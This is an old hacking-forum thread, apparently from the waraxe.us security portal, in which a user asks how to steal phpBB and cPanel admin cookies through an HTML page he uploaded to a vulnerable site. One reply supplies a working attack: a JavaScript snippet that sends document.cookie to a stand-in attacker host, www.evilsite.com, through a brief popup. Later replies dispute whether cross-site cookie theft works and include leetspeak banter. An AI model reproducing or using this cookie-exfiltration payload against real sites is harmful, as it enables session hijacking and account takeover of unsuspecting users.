Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 214
Members: 0
Total: 214
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> again cookie stealin'
Post new topicReply to topic View previous topic :: View next topic
again cookie stealin'
PostPosted: Fri Oct 01, 2004 8:49 pm Reply with quote
Roberto
Regular user
Regular user
Joined: Sep 01, 2004
Posts: 8




i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.

i may direct people to that uploaded page,it is easy

but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?

of course i will upload an evil script to my site.

thanks again
View user's profile Send private message
PostPosted: Sun Dec 12, 2004 12:13 pm Reply with quote
Oguz
Regular user
Regular user
Joined: Nov 29, 2004
Posts: 7




i need this too ...
View user's profile Send private message
PostPosted: Sun Dec 12, 2004 1:55 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




there are very many ways you could do it i'll write here one from which
you can make a better one.

html 1
Code:

<html>
<head>
<title>reperdalaj</title>
<script language="JavaScript" src="foo.js"></script>
</head>

<body>
hi i'm evil page!
</body>

</html>


foo.js 1
Code:

var query = "www.evilsite.com/script.php?string=" + document.cookie;
var nWindow = window.open(query,'nwin','height=1;width=1');
nWindow.close();


this loads a popup window for very short time.
after remembering that there are pop-up blockers this will not probably work on many users.

you could make a frame instead and join the html and js, learning html and basic javascript helps. so take your time and google. Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Re: again cookie stealin'
PostPosted: Sat Dec 18, 2004 3:59 pm Reply with quote
emrag
Regular user
Regular user
Joined: Jun 03, 2004
Posts: 20
Location: TURKEY




Roberto wrote:
i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.

i may direct people to that uploaded page,it is easy

but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?

of course i will upload an evil script to my site.

thanks again



i think this isn't possible so you want a phpbb's cookie but there is no XSS in it. you can't get a site's cookie with another site's XSS.
View user's profile Send private message MSN Messenger ICQ Number
PostPosted: Sun Feb 27, 2005 8:48 pm Reply with quote
Alkaen
Regular user
Regular user
Joined: Feb 16, 2005
Posts: 5
Location: Bahrain - Aldair




Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n

_________________
Alkaen with u..
View user's profile Send private message Visit poster's website
PostPosted: Fri Mar 04, 2005 6:20 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




Alkaen wrote:
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n


i did get shit
lol of course i got that but plz write neat thats ricicule**
View user's profile Send private message
PostPosted: Tue Dec 05, 2006 7:43 pm Reply with quote
faifas
Regular user
Regular user
Joined: Feb 25, 2005
Posts: 8




HaCkZataN wrote:
Alkaen wrote:
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n


i did get shit
lol of course i got that but plz write neat thats ricicule**

3 = e
5 = s
$ = 5 = s
etc.
View user's profile Send private message Visit poster's website
again cookie stealin'
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.146 Seconds